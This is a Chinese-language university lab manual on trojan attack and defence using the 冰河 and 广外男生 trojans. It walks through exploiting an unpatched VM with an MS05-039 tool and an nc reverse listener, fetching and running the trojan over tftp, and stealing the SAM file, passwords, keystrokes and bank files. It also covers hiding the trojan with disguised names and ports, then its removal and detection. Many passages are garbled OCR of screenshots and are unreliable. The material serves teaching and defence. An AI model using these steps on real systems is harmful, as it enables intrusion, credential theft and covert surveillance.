实验指导5：木马攻击与防范实验指导书

1、实验指导5木马攻击与防范实验.实验目的理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。.预备知识木马及木马技术的介绍（1）木马概念介绍很多人把木马看得很神秘，其实，木马就是在用户不知道的情况下被植入用户计算机，用来获取用户计算机上敏感信息（如用户口令，个人隐私等）或使攻击者可以远程控制用户主机的一个客户服务程序。这种客户/服务模式的原理是一台主机提供服务（服务器），另一台主机使用服务（客户机）。作为服务器的主机一般会打开一个默认的端口并进行监听（Listen）,如果有客户机向服务器的这一端口提出连接请求（ConnectRequest）

2、，服务器上的相应守护进程就会自动运行，来应答客户机的请求。通常来说，被控制端相当于一台服务器，控制端则相当于一台客户机，被控制端为控制端提供预定的服务。（2）木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤，但是对于连出的链接却疏于防范。于是，与一般的木马相反，反弹端口型木马的服务端（被控制端）使用主动端口，客户端（控制端）使用被动端口。木马定时监测控制端的存在，发现控制端上线立即弹出端口主动连结控制端打开的主动端口；为了隐蔽起见，控制端的被动端口一般开在80，这样，即使用户使用端口扫描软件检查自己的端口，发现的也是类似TCPUserIP:1026ControllerIP:8

3、0ESTABLISHED的情况，稍微疏忽一点，你就会以为是自己在浏览网页。（3）线程插入技术木马程序的攻击性有了很大的加强，在进程隐藏方面，做了较大的改动，不再采用独立的EXE可执行文件形式，而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。这样木马的攻击性和隐藏性就大大增强了。木马攻击原理特洛伊木马是一个程序，它驻留在目标计算机里，可以随计算机自动启动并在某一端口进行侦听，在对接收的数据识别后，对目标计算机执行特定的操作。木马，其实质就是一个通过端口进行通信的网络客户/服务程序。(1)基本概念网络客户/服务模式的原理是一台主机提供服务(服务器)，另一台主机接受服务(客户机)。作为服务

4、器的主机一般会打开一个默认的端口并进行监听(Listen)如果有客户机向服务器的这一端口提出连接请求(ConnectRequest)服务器上的相应程序就会自动运行，来应答客户机的请求，这个程序称为守护进程UNIX的术语，不过已经被移植到修系统七。对于特洛伊木马,被控制端就成为一台服务器空制端则是一台客户成守护进程，G.client是客户端应用程序。(2)实现木马的控制功能由于Win98开放了所有的权限给用户，因此，以用户权限运行的木马程序几乎可以控制一切，下面仅对木马的主要功能进行简单的概述，主要是使用WindowsAP函数。远程监控(控制对方鼠标、键盘，并监视对方屏)幕keybd_even模

5、拟一个键盘动作。mouse_even模拟一次鼠标事件mouse_event(dwFlagdx,dy,eButtonsdwExtralnfo)dwFlags:MOUSEEVENTF_ABSOLU指定鼠标坐标系统中的一个绝对位置MOUSEEVENTF_MOV动鼠标MOUSEEVENTF_LEFTDO横拟鼠标左键按下MOUSEEVENTF_LEFT嘿拟鼠标左键抬起MOUSEEVENTF_RIGHTDO横拟鼠标右键按下MOUSEEVENTF_RIGHT膜拟鼠标右键按下dx,dy:MOUSEEVENTF_ABSOLl中的鼠标坐标。记录各种口令信息keylogbegi：n将击键记录在一个文本文件里,同时还

6、记录执行输入的窗口名。获取系统信息a.取得计算机名GetComputerNameb.更改计算机名SetComputerNamec.当前用户GetUserNamed.系统路径e.取得系统版本f.当前显示分辨率限制系统功能a.远程关机或重启计算机，使用WinAPI中的如下函数可以实现。ExitWindowsEx(UINTuFlags，DWORDdwReserved)当uFlags=EWX_LOGOFF中止进程，然后注销=EWX_SHUTDOWN关掉系统但不关电源=EWX_REBOOT重新引导系统二EWX_FORCE强迫中止没有响应的进程=EWX_POWERDOWN关掉系统及关闭电源b.锁定鼠标，C

7、lipCursor(lpRectAsRECT)可以将指针限制到指定区域，或者用ShowCursor(FALSE)把鼠标隐藏起来也可以，RECT是定义的一个矩形。c.让对方掉线RasHangUpd.终止进程ExitProcesse.关闭窗口利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口远程文件操作删除文件：Filedelete拷贝文件：Filecopy共享文件：Exportlist(列出当前共享的驱动器、目录、权限及共享密码)注册表操作在VB中只要SetRegEdit=CreateObject()就可以使用以下的注册表功能：删除键值:RegKey增加键值:RegKe

8、y，RegValue获取键值:(Value)木马的防范建议A.不要随意打开来历不明的邮件现在许多木马都是通过邮件来传播的，当你收到来历不明的邮件时，请不要打开，应尽快删除。并加强邮件监控系统，拒收垃圾邮件。B.不要随意下载来历不明的软件最好是在一些知名的网站下载软件，不要下载和运行来历不明的软件。在安装软件的同时最好用杀毒软件查看有没有病毒，之后才进行安装。C.及时修补漏洞和关闭可疑的端口一般木马都是通过漏洞在系统上打开端口留下后门，以便上传木马文件和执行代码，在把漏洞修补上的同时，需要对端口进行检查，把可疑的端口关闭。D.尽量少用共享文件夹如果必须使用共享文件夹，则最好设置帐号和密码保护。注

9、意千万不要将系统目录设置成共享，最好将系统下默认共享的目录关闭。Windows系统默认情况下将目录设置成共享状态，这是非常危险的。E.运行实时监控程序在上网时最好运行反木马实时监控程序和个人防火墙，并定时对系统进行病毒检查。F.经常升级系统和更新病毒库。3.实验环境1）预备知识要求了解网络的基本知识；熟练使用windows操作系统；充分理解木马攻击原理；熟悉缓冲溢出攻击。2）下载和运行木马软件期间，请关闭杀毒软件的自动防护功能以及防火墙,否则程序会被当作病毒而强行终止。运行环境1）需要下载的其它的工具软件有：:tftp服务程序，用来传输“冰河”木马服务端程序:缓冲溢出攻击反向连接服务程序（参见

10、“缓冲区溢出攻击与防范实验”）;:缓冲溢出攻击工具（参见“缓冲区溢出攻击与防范实验”）;冰河木马.exe:冰河木马程序；:“广外男生”木马程序。2）本实验需要用到虚拟机，因此每台实验主机都通过安装软件WMwareWorkstation分割出虚拟机。真实主机P1的配置为：操作系统Windows2000server或者windowsxpsp2,并且安装缓冲区溢出攻击软件，“冰河”木马，“广外男生”木马。虚拟机P2配置为:操作系统Windows2000Server（没有打补丁，存在ms05039漏洞，并且安装了1卫组件）。3）实验环境拓扑如图1所示：图1实验网络拓扑图请根据实验环境将IP地址填入下表

11、，攻防实验服务器IPP1:本机IPP2:本机上的虚拟机IPP3:表1实验IP实验中，可把真实机P2作为攻击机，安装上“冰河”木马程序，和“广外男生”；虚拟机P3作为被攻击主机，安装IIS组件。4.实验内容和步骤实验任务一：“冰河”木马本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。A.“冰河”使用：冰河是一个基于TCP/IP协议和Windows操作系统的网络工具，所以首先应确保该协议已被安装且网络连接无误，然后配置服务器程序（如果不进行配置则取默认设置），并在欲监控的计算机上运行服务器端

12、监控程序即可。主要文件包括：a.:被监控端后台监控程序（运行一次即自动安装，可任意改名），在安装前可以先通过G_Client”的配置本地服务器程序功能进行一些特殊配置，例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等）；b.:监控端执行程序，用于监控远程计算机和配置服务器程序。具体功能操作包括：a.添加主机：将被监控IP地址添加至主机列表，同时设置好访问口令及端口，设置将保存在文件中，以后不必重输。如果需要修改设置，可以重新添加该主机，或在主界面工具栏内重新输入访问口令及端口并保存设置。b.删除主机：将被监控端IP地址从主机列表中删除。自动搜索：搜索指定子网内安装有冰河的计算机。

13、查看屏幕：查看被监控端屏幕。屏幕控制：远程模拟鼠标及键盘输入。“冰河”信使：点对点聊天室。修改远程配置：在线修改访问口令，监听端口等服务器程序设置，不需要重新上传整个文件，修改后立即生效。B.在对“冰河”有所了解之后，我们进入攻防实验阶段一一使用“冰河”对目标计算机进行控制：在目标主机（虚拟机）上植入木马，即在此主机上运行G_Sever，作为服务器端；在攻击机上运行G_Client，作为控制端。分别运行这两个.exe文件后，我们进入控制端主界面，按照以下步骤来实现对目标主机的控制。步骤1：入侵准备工作1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被当作病毒而强行终止。2）运行

14、，如图2；女伴旧特辑旧还置回帮眈W女伴旧特辑旧还置回帮眈W当前朝：而砺/ZI谢口：丁访问口号（_j文件首电器电曲等控制台|二I*河VU_4NEWFUN皆用J图2“冰河”运行主界面3）选择菜单“设置”-“配置服务程序”，如图3；图3设置木马服务4）设置访问口令为“1234567”，其它为默认值，点击“确定”生成木马的服务端程序。5）将生成的木马服务程序拷贝到tftp服务的目录即C:攻防tftp32,如图4。后退-鱼I微矍索|a文件夹曾|嗡电x堂|国，Ktlt（D）叵匚:攻防忡p32文件夹X的桌面-文件夹X的桌面-且我的电脑+$3,5软盘3：-，本地橙盘仁)DocumenzsandSettirFO

15、UND.LOUProgramFilestmp1AlNNT攻防二l-Jf七L口tftp32选定项目可以查看三说明.另请参阅：我的文档网上邻居我的电脑叵|於G_5erver.exetftpd32,exetftp32_J冰河+_J本地催盘tftp32_J冰河+_J本地催盘(D),.11.图4将拷贝到目录5攻防tftp326）运行，务程序。如图5。保持此程序一直开启，用于等待攻击成功后传输木马服图5tftp服务运行步骤2：进行攻击，将木马放置在被攻击端1）对靶机P3进行攻击，首先运行nc-vv-l-p99接着再开一个dos窗口，运行ms05039991（注意：此次IP地址请根据实际IP地址修改）2）攻

16、击成功后，在运行nc-vv-l-p99的dos窗口中出现如图6提示，若攻击不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。CsIND0S33FiSi：B32kcd.cse-nc-w-1-d99UindLnusKFT5-1.2600版权Et有19B52001MicrosoftGurpBC：%J)ocumcnitsandScttingsMuablc.liicdC=onsffanarCsgorincvu1p99listenino1onLa.1151J9号HHHCDnnectfpninC0hmH0R-76.fiiC96C192_168_3,15011B32MlcpnanftUindLaus20

17、0rUeFslnm5_2iS53版权所有1T85-200BMicrosoftCofd.C：HHTSsy即n32.图6攻击成功示意3）在此窗口中运行tftp-iget将木马服务程序上传到靶机P3上，并直接输入使之运行，如图7。图7上载木马程序并运行步骤3：运行木马客户程序控制远程主机1）打开程序端程序，单击快捷工具栏中的“添加主机”按扭，如图8所示。“显示名称”：填入显示在主界面的名称“target“主机地址”：填入服务器端主机的IP地址20.23”。“访问口令”：填入每次访问主机的密码，这里输入“1234567”。“监听端口”：“冰河”默认的监听端口是7626,控制端可以修改它以绕过防火墙。图

18、8添加主机单击“确定”按扭，即可以看到主机面上添加了主机，如图16。图9添加主机后主界面这时我们就可以像操作自己的电脑一样操作远程目标电脑，比如打开C:WINNTsystem32config目录可以找到对方主机上保存用户口令的SAM文件。点击鼠标右键，可以发现有上传和下载功能。即可以随意将虚拟机器上的机密文件下载到本机上，也可以把恶意文件上传到该虚拟机上并运行。可见，其破坏性是巨大的。2)“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可以浏览目标主机内容。如图17所示，通过浏览可以发现目标主机的敏感信息，如“银行账号”等。二口2s.文件口编辑匡15HEG帮助国,孰圈里|Q|回量君

19、|。修当前连接：“七ZJ淌=i：运二访向口令：|*|应用叵acnbdok馄行贴号文件名称口.狗工仔块七包建行tKt二口国后做施施磁幼后图acnbdok馄行贴号文件名称口.狗工仔块七包建行tKt二口国后做施施磁幼后图磁包磁G:Itl-Fl-E.,E-!凹，0-EFFlFl-E-K-:凹！凹；.：E田支件大小与节)最后更撕时间9S200G-G-2312:03:5640200日-日-231?050hacknrnunashiyzTi即百KECYCLER衔回逾立年周交流锁定泵统无或网络安嚏学习瞟件2个对象.图9浏览至敏感信息然后选中文件，在右键菜单中选中“下载文件至.”，在弹出的对话框中选好本地存储路径

20、，点击“保存”。下载成功是界面如图10。文怦编强旧谖置段帮助田当箭连搔：七文怦编强旧谖置段帮助田当箭连搔：七3七，端口：rszB访同口令：*仙*应用匡日文伴管理器也命令控制告ILEUlCLER厨儡阚口徐徐酶陶000ILEUlCLER厨儡阚口徐徐酶陶000国陶今0曲，.尹旺.0-,4!尹日0-,旺；旺.尹0-0-;.4巴日&：gII国一文件传送完毕7图10成功下载文件后界面2)“命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面，如图11，验证控制的各种命令。口等英命令当前连接：.j文件莒理器%口等英命令当前连接：.j文件莒理器%命令控制吉建制二的作网络第命令文件类饰除注册赛法写谀匿

21、手前吟诘从左则列表中选择相关能等图11命令控制台a.口令类命令：展开“口令类命令”，如图12当前连接：七江3士|文件营理锚电命雷控制台Q口令类由金泵统信息及口令历史口令击槌记录拴判匪出台当前连接：七江3士|文件营理锚电命雷控制台Q口令类由金泵统信息及口令历史口令击槌记录拴判匪出台网络类命令文件类布令fiQ,注册表读写十片L设置类命令;I6壬应计牛.i内布受克C:荫如日.器IW【目目机佥用用内向宛高任,!，魂对苴lln册前任项面面ID.II:录户户-fr存度度PniijdWindowsSTC加:EHTlc/-.imirrkEYEtQms1.C:匚口叫八虹懵BI、1.COM.LO匚ALSNLTmf

22、%COMN01DR-766C90A-Iministrator2GTH211HMB4O4S0KEZJJ前SIM.lS97.23O015：i44M440.EBBL3ZB1Z5W开机口等缴存口令其它口令数据沅报收完毕.图12口令类命令“系统信息及口令”可以查看远程主机的系统信息，开机口令，缓存口令等。“历史口令”可以查看远程主机以往使用的口令。“击键记录”可以记录远程主机用户击键记录，以次可以分析出远程主机的各种帐号和口令或各种秘密信息。b.控制类命令：展开“控制类命令”，如图13。当前这按：，皓口：当前这按：，皓口：T626访问口令：厘用见_3文件管理器电命等控刘告C1口令类命令-0控制类命令捕获

23、屏幕发送情思i进程首理,窗口管理本统控制鼠标控制.11:.11:田；因.由屏后控制0b网络类命令【三文性类命令C1注册表读写口1诳查类命全屏后控制捕获区域：全屏色海口一口二nn：传输格式：|enf三品质口-10口：15图13控制类命令“捕获屏幕”可以使控制端使用者查看远程主机的屏幕。“发送信息”可以向远程计算机发送Windows标准的各种信息。“进程管理”可以使控制者查看远程主机上所有的进程，如图14。单击“查看进程”按钮，就可以看到远程主机上存在的进程，甚至还可以终止某个进程，只要选中相应的进程，然后单击“终止进程”就可以了。A,I口令英前会IzIt控制莞命等,捕乘屏耳A,I口令英前会IzI

24、t控制莞命等,捕乘屏耳发送信息9进程后理吉口言理率藐控制,鼠标控制,其它控制同降莞前生当前连拉：卜皿,七二口揣口：眄函一访问口令：阿否匚应用国台文件管理器与命令拄制白Sys-aiplrSysF.d4rSysFtderletDBEVinddwsWindowsCSCJ(otificb.fiqtis.hindjou出遍去.CorifL4cti4RS7r4YHIEServerWindow3YSFEMAJGEHTEHfiIJiTOlYHIMNotifyCallbtckFIEk亡buhwoHI4niior银行以MFrogrsitiFJandgor由：田：田：田耀止进程数一流扭收完毕_二图14远程主机进程控

25、制“窗口管理”可以使远程主机上的窗口进行刷新，最大化，最小化，激活，隐藏等。“系统管理”可以使远程主机进行关机，重启，重新加载“冰河”，自动卸载“冰河”的操作。“鼠标控制”可以使远程主机上的鼠标锁定在某个范围内。“其他控制”可以使远程主机上进行自动拨号禁止，桌面隐藏，注册表锁定等操作。c网络类命令展开“网络类命令”，如图15:“创建共享”在远程主机上创建自己的共享。“删除共享”在远程主机上删除某个特定的共享。“网络信息”可以看到远程主机上的IPC$，C$，人口忖小$等共享。d文件类命令：展开“文件类命令”，文件浏览，“文件查找”，“文件压缩”,“文件删除”，“文件打开”等。e注册表读写：展开“

26、注册表读写”f设置类命令：展开“设置类命令”图15网络命令步骤4：删除“冰河”木马删除“冰河”木马的方法：A.客户端的自动卸载功能，在“控制命令类”中的“系统控制”里面就有自动卸载功能，执行这个功能，远程主机上的木马就自动卸载了。B.手动卸载，查看注册表，打开windows注册编辑器。打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun如图16。在目录中发现了一个默认的键值C:WINNTSystem32,这就是“冰河”木马在注册表中加入的键值，将它删除。打开HKEY_LOCAL_MACHINESOFTWAREMicrosof

27、tWindowsCurrentVesionRunservices,如图17。在目录中也发现了一个默认的键值C:WINNTSystem32,这也是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序，一般病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。图16注册表编辑-l-n-r-n-nmu-n-n-r-l回回：厂争办r曲：L;厂甲由；厂甲办：厂甲,厂厂厂甲厂品由分，：甲甲GroupPolicyH323T5PnstalernternetSektngsntlRjunLntlRun-l-

28、n-r-n-nmu-n-n-r-l回回：厂争办r曲：L;厂甲由；厂甲办：厂甲,厂厂厂甲厂品由分，：甲甲GroupPolicyH323T5PnstalernternetSektngsntlRjunLntlRun,口匚PLcrFMSPPCcnFT5PM8ModuteUsacpM5-DC6ErnulabDnNetCchepliersREli.=bifitvRunRunGTCBRunOrceERjunServfcesSetupSharadDLLsLFLTW力氏鼠5kll我的电脑1HKE5nager32h.eceSyDcniar图17注册表编辑然后再进入C:WINNTSystem32目录，找到“冰河”的

29、两个可执行文件和文件，将它们删除，如图18。文件编辑但查看的收藏（由工具帮助CW文件编辑但查看的收藏（由工具帮助CW仁后退一,回I四搜索I刍文件夹|四喏X筋|国地址（9|Isystems2文件夹-十十本地磁盅（C。Document?and5ettlrLJiProgramFlies臣WINNTaddinsAppPatch文件夹-十十本地磁盅（C。Document?and5ettlrLJiProgramFlies臣WINNTaddinsAppPatchassemblyConfigConnectionWizarCurscrsDebugDownloadedInst-：DoAnluadedProgDri

30、verCache!田：选定Z个对象蛆es.dll回mpg4d32.次喻raemuntr.dllvwow：32jdll布COMDLG3?.DLL/msjtes4O.dll/cscui.dll唠qmgr.dll可M5FLXGR.D.OCK至|lcnri3Z.dll但localsec.dl唠5trmdll.dll至|msie HYPERLINK Ftp.dll司inetcfg.dllM5RD2X35,DLL5Z0KB望sizesrvjzlll司rriE-.-crt2U.dllh323.tspwebchtackudll司rri5h263.dr-,竺rristesH-O.dll司|WINSR1-7.DL

31、L言LOCAL5PL.DLL闻sortkey.nIs啕QTFhjglri.uizx啕P15DATGRD.OC；：啕d:：rnrtp.dllddraAi.dllddeF2dnrvE/M-I5err1.Id口qpwhVprlLr-ll-prllzvk包回包回包包包包*包包型包且我的电脑图18删除木马程序修改文件关联也是木马常用的手段，“冰河”将txt文件的缺省打开方式由改为木马的启动程序，除此之外，html,exe，zip，com等都是木马的目标。所以，最后还需要恢复注册表中的txt文件关联功能，只要将注册表中的HKEY_CLASSES_ROOTtxtfileshellopencommand下的默

32、认值，改为C:Windows%1，即可，如图19。这样，再次重启计算机我们就完全删除了“冰河”木马。C.杀毒软件查杀大部分杀毒软件都有查杀木马的功能，可以通过这个功能对主机进行全面扫描来去除木马，就彻底把木马文件删除了。htfle口AdUo：fiiihl由htfle口AdUo：fiiihl由匚J日犯邮违T,.jjrtswThS-gl中里F*m口力叫1忖闺on非图i映出白掰%dE工三二本次和的命jH#：q!E帝iWd?口口口口口自口口口口口自s口口口口吕q日THExim&4.fdLpTA.Llut.GUiTksLM闻黯r_Bt.F*dEngiTn_ec固国飘5rM61Tn_Bh%l/AckaQ*

33、injstk肾声dWgL11闻JluPUrrTlLSt加罩gi跛由拈I百萌f1r_Bt.、*d*tfuir.LIS囱bHTSHtK.T.TSH&jRb-I.L13lrt3ffnpaT：fiTOfrMnlwnpTiLTSLV.1SLY15LV.13-V.LMisttfHaCTx.T”历士鱼匚Ci咕5眈图19去除关联实验任务二：“广外男生”木马本实验将真实机作为攻击机，虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击，最终完全取得虚拟机的控制权。最后学习木马的查杀。1）“广外男生”的连接运行，打开“广外男生”的主程序，主界面如图20。图20“广外男生”主界面进行客户端设置。依次单击“设置

34、”“客户端设置”，弹出客户端设置界面如图21。我们可以看到它采用“反弹窗口线程插入技术”的提示。在“客户端最大连接数”中填入允许多少台客户端主机来控制服务器端，注意不要太多，否则容易造成服务器端主机死机。在“客户端使用端口”填入服务器端连接到客户端的那个端口，这是迷惑远程服务器端主机管理员和防火墙的关键，填入一些常用端口，会使远程主机管理员和防火墙误以为连接的是个合法的程序。比如使用端口80（此例中，为避免端口冲突，我们使用1500端口）。选择“只允许以上地址连接”选项，使客户端主机IP地址处于默认的合法控制IP地址池中。图21客户端设置程序（2）设置木马的连接类型，如果使用反弹端口方式二则在

35、弹出对话框中选中“使用HTTP网页IP通知”如果使用反弹端口方式一，则选择“客户处于静态IP（固定IP地址）”，如图22。此处我们选择后者。单击“下一步”，和“完成”，结束客户端设置。图22木马连接类型设置（4）进行服务器端设置。依次单击“设置”“生成服务器端”，这时弹出“广外男生”服务器端生成向导，直接单击“下一步”，弹出常规设置界面，如图23。图23服务器端设置在“EXE文件名”和“DLL文件名”中填入加载到远程主机系统目录下的可执行文件和动态链接库文件，在“注册表项目”中填入加载到远程主机注册表中的Run目录下的键值名。这些文件名都是相当重要的，因为这是迷惑远程主机管理员的关键所在，如果

36、文件名起的非常隐蔽，如，那么就算管理员发现了这些文件也不肯定这些文件就是木马而轻易删除。注意：把“服务器端运行时显示运行标志并允许对方退出”前面的对勾去掉，否则服务器端主机的管理员就可以轻易发现自己被控制了。（5）进行网络设置，如图24选择“静态IP”，在“客户端IP地址”中填入入侵者的静态IP地址（即真实机IP），“客户端用端口”填入在客户端设置中选则的连接端口。图24网络设置（6）生成代理文件，在“目标文件”中填入所生成服务器端程序的存放位置，如E:gwboy092A,这个文件就是需要植入远程主机的木马文件。单击“完成”即可完成服务器端程序的设置，这时就生成了一个文件名为的可执行文件，如图

37、25，并将该文件拷贝到虚拟机桌面上图25生成代理文件（7）进行客户端与服务器连接。在虚拟机上执行木马程序，等待一段时间后客户端主机“广外男生”显示连接成功，如图26。这时，就可以和使用第2代木马“冰河”一样控制远程主机，主要的控制选项有“文件共享”，“远程注册表”，“进程与服务”，“远程桌面”等。1&S黑于电）文件信息1&S黑于电）文件信息图26客户端与服务器连接成功2）命令行下“广外男生”的检测（1）由于使用了“线程插入技术”，所以在windows系统中采用任务管理器查看线程是发现不了木马的踪迹的，只能看到一些正常的线程在运行，所以需要用到另外两个工具：fport和tlist。fport是第

38、三方提供的一个工具，可以查看某个具体的端口被哪个进程所占用，并能查看PIDtlist是windows资源工具箱中提供的工具，功能非常强大，我们利用它查看进程中有哪些动态链接库正在运行，这对于检测插入在某个正常进程中的线程是非常有用的。【问题2】：什么是“线程插入技术”（2）在服务器端主机（虚拟机）上依次单击“开始”一“运行”输入cmd,进入命令行提示符，在这里输入口0$土-an，查看网络端口占用状态，如图27。在显示结果中，发现可疑IP地址（就是客户端IP地址）与本机建立了连接，这是我们需要注意的地方，记住本机用于连接的端口号1231，1232，1233，1234。F：netstat-anAc

39、tiueConnectionsProtoTCPTCPTCPTCPTCPTCPTCPTCPTCPLocalAddressForeignAddressB_H_I3.B_S_0.00.0u.：ProtoTCPTCPTCPTCPTCPTCPTCPTCPTCPLocalAddressForeignAddressB_H_I3.B_S_0.00.0u.：135:445:1025：ises：1S8151082S1B8350=139192.1G8.3.150=1390.B_s.ia：s0a0.0.0：00a0_0.0：:0:0:0192.Its,3.163=1342StateLISTENINGLISTENING

40、L1STEM1NGLISTENINGLISTENINGLISTENINCLISTENINGLISTENINGESTflDLISHEDUDPUDPUDPIIDFUDPUDPUDPUDPUDPIIDFUDPUDPTCP192.160.：3.i5e：ieee192.16B.3.163:1500ESTABLISHTer192.1G8.：3.502108163:1500ESTALISHTer192.1G8.：3.50510823-150=1083192.1G8.3.163=1500ESTALISHLISHTCP192.168.：63;1500ESTA0.0.0,0;13:44:1026192,168,3

41、.150:137192,168,3.150:13850=50B图27命令行下键入netstatan命令（3）接着在提示符下输入fport（注意，要在有的目录中运行fport）,在显示结果中找到以上端口号，发现木马插入的进程是，记住此进程的PID号728,如图28。1_325-2195.6692shUSP1GI_DLL408suchost8Systcn8408suchost8Systcn8Sijstein却串七211224lease212sewIces：578503334011145C-XWINNTXsysten32Xsunhost.exeUDPUDPUDPC=INNT5F3tcnt32Sis.cxeC二WINNTsyst